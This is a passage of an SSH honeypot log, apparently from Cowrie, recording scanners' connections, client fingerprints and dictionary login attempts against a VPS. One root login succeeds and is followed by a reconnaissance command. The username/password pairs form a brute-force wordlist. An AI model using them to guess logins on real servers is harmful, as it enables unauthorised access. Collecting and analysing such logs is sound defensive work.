{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":52614,"dst_ip":"1.2.3.4","dst_port":22,"session":"d97fcce95c00","protocol":"ssh","message":"New connection: 185.93.89.7:52614 (1.2.3.4:22) [session: d97fcce95c00]","sensor":"my-vps","timestamp":"2025-08-28T09:16:56.988937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:16:56.989894Z","src_ip":"185.93.89.7","session":"d97fcce95c00"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:16:57.007737Z","src_ip":"185.93.89.7","session":"d97fcce95c00"}
{"eventid":"cowrie.login.failed","username":"index","password":"password1","message":"login attempt [index/password1] failed","sensor":"my-vps","timestamp":"2025-08-28T09:16:57.050213Z","src_ip":"185.93.89.7","session":"d97fcce95c00"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:16:58.071384Z","src_ip":"185.93.89.7","session":"d97fcce95c00"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55240,"dst_ip":"1.2.3.4","dst_port":22,"session":"633c9a3eacd8","protocol":"ssh","message":"New connection: 217.72.205.35:55240 (1.2.3.4:22) [session: 633c9a3eacd8]","sensor":"my-vps","timestamp":"2025-08-28T09:17:01.784981Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:17:01.786965Z","src_ip":"217.72.205.35","session":"633c9a3eacd8"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":38270,"dst_ip":"1.2.3.4","dst_port":22,"session":"11b455eb5c99","protocol":"ssh","message":"New connection: 51.79.164.132:38270 (1.2.3.4:22) [session: 11b455eb5c99]","sensor":"my-vps","timestamp":"2025-08-28T09:17:06.674548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:17:06.876165Z","src_ip":"51.79.164.132","session":"11b455eb5c99"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:17:06.876832Z","src_ip":"51.79.164.132","session":"11b455eb5c99"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T09:17:08.625569Z","src_ip":"51.79.164.132","session":"11b455eb5c99"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:17:10.238415Z","src_ip":"51.79.164.132","session":"11b455eb5c99"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35862,"dst_ip":"1.2.3.4","dst_port":22,"session":"e519de3da1c7","protocol":"ssh","message":"New connection: 185.93.89.7:35862 (1.2.3.4:22) [session: e519de3da1c7]","sensor":"my-vps","timestamp":"2025-08-28T09:17:21.550867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:17:21.551797Z","src_ip":"185.93.89.7","session":"e519de3da1c7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:17:21.572106Z","src_ip":"185.93.89.7","session":"e519de3da1c7"}
{"eventid":"cowrie.login.failed","username":"index","password":"7777777","message":"login attempt [index/7777777] failed","sensor":"my-vps","timestamp":"2025-08-28T09:17:21.610471Z","src_ip":"185.93.89.7","session":"e519de3da1c7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:17:22.636957Z","src_ip":"185.93.89.7","session":"e519de3da1c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46072,"dst_ip":"1.2.3.4","dst_port":22,"session":"20368f0ec8b8","protocol":"ssh","message":"New connection: 212.227.125.160:46072 (1.2.3.4:22) [session: 20368f0ec8b8]","sensor":"my-vps","timestamp":"2025-08-28T09:17:26.021908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.1","message":"Remote SSH version: SSH-2.0-libssh-0.1","sensor":"my-vps","timestamp":"2025-08-28T09:17:26.296300Z","src_ip":"212.227.125.160","session":"20368f0ec8b8"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:17:26.570279Z","src_ip":"212.227.125.160","session":"20368f0ec8b8"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":60400,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed2ea27984bd","protocol":"ssh","message":"New connection: 51.79.164.132:60400 (1.2.3.4:22) [session: ed2ea27984bd]","sensor":"my-vps","timestamp":"2025-08-28T09:17:33.223402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:17:33.403166Z","src_ip":"51.79.164.132","session":"ed2ea27984bd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:17:33.903286Z","src_ip":"51.79.164.132","session":"ed2ea27984bd"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:17:35.313749Z","src_ip":"51.79.164.132","session":"ed2ea27984bd"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:17:36.908400Z","src_ip":"51.79.164.132","session":"ed2ea27984bd"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35924,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0b59a69b102","protocol":"ssh","message":"New connection: 185.93.89.7:35924 (1.2.3.4:22) [session: b0b59a69b102]","sensor":"my-vps","timestamp":"2025-08-28T09:17:45.269505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:17:45.273069Z","src_ip":"185.93.89.7","session":"b0b59a69b102"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:17:45.306630Z","src_ip":"185.93.89.7","session":"b0b59a69b102"}
{"eventid":"cowrie.login.failed","username":"index","password":"11111111","message":"login attempt [index/11111111] failed","sensor":"my-vps","timestamp":"2025-08-28T09:17:45.346531Z","src_ip":"185.93.89.7","session":"b0b59a69b102"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:17:46.373969Z","src_ip":"185.93.89.7","session":"b0b59a69b102"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37464,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d24e3f132ba","protocol":"ssh","message":"New connection: 51.79.164.132:37464 (1.2.3.4:22) [session: 7d24e3f132ba]","sensor":"my-vps","timestamp":"2025-08-28T09:17:59.006549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:17:59.086240Z","src_ip":"51.79.164.132","session":"7d24e3f132ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:17:59.586092Z","src_ip":"51.79.164.132","session":"7d24e3f132ba"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:18:01.024788Z","src_ip":"51.79.164.132","session":"7d24e3f132ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:18:02.004673Z","src_ip":"51.79.164.132","session":"7d24e3f132ba"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:18:02.005365Z","src_ip":"51.79.164.132","session":"7d24e3f132ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:18:02.664057Z","src_ip":"51.79.164.132","session":"7d24e3f132ba"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:18:02.665413Z","src_ip":"51.79.164.132","session":"7d24e3f132ba"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":42124,"dst_ip":"1.2.3.4","dst_port":22,"session":"de53948b2ec5","protocol":"ssh","message":"New connection: 185.93.89.7:42124 (1.2.3.4:22) [session: de53948b2ec5]","sensor":"my-vps","timestamp":"2025-08-28T09:18:08.816883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:18:08.855013Z","src_ip":"185.93.89.7","session":"de53948b2ec5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:18:08.855905Z","src_ip":"185.93.89.7","session":"de53948b2ec5"}
{"eventid":"cowrie.login.failed","username":"index","password":"matrix","message":"login attempt [index/matrix] failed","sensor":"my-vps","timestamp":"2025-08-28T09:18:08.982461Z","src_ip":"185.93.89.7","session":"de53948b2ec5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:18:10.010648Z","src_ip":"185.93.89.7","session":"de53948b2ec5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":50998,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbb3e166b9d6","protocol":"ssh","message":"New connection: 51.79.164.132:50998 (1.2.3.4:22) [session: bbb3e166b9d6]","sensor":"my-vps","timestamp":"2025-08-28T09:18:25.656457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:18:26.244514Z","src_ip":"51.79.164.132","session":"bbb3e166b9d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:18:26.245331Z","src_ip":"51.79.164.132","session":"bbb3e166b9d6"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:18:29.357450Z","src_ip":"51.79.164.132","session":"bbb3e166b9d6"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:18:30.611763Z","src_ip":"51.79.164.132","session":"bbb3e166b9d6"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":59920,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fa32dc4340c","protocol":"ssh","message":"New connection: 185.93.89.7:59920 (1.2.3.4:22) [session: 3fa32dc4340c]","sensor":"my-vps","timestamp":"2025-08-28T09:18:32.532748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:18:32.559697Z","src_ip":"185.93.89.7","session":"3fa32dc4340c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-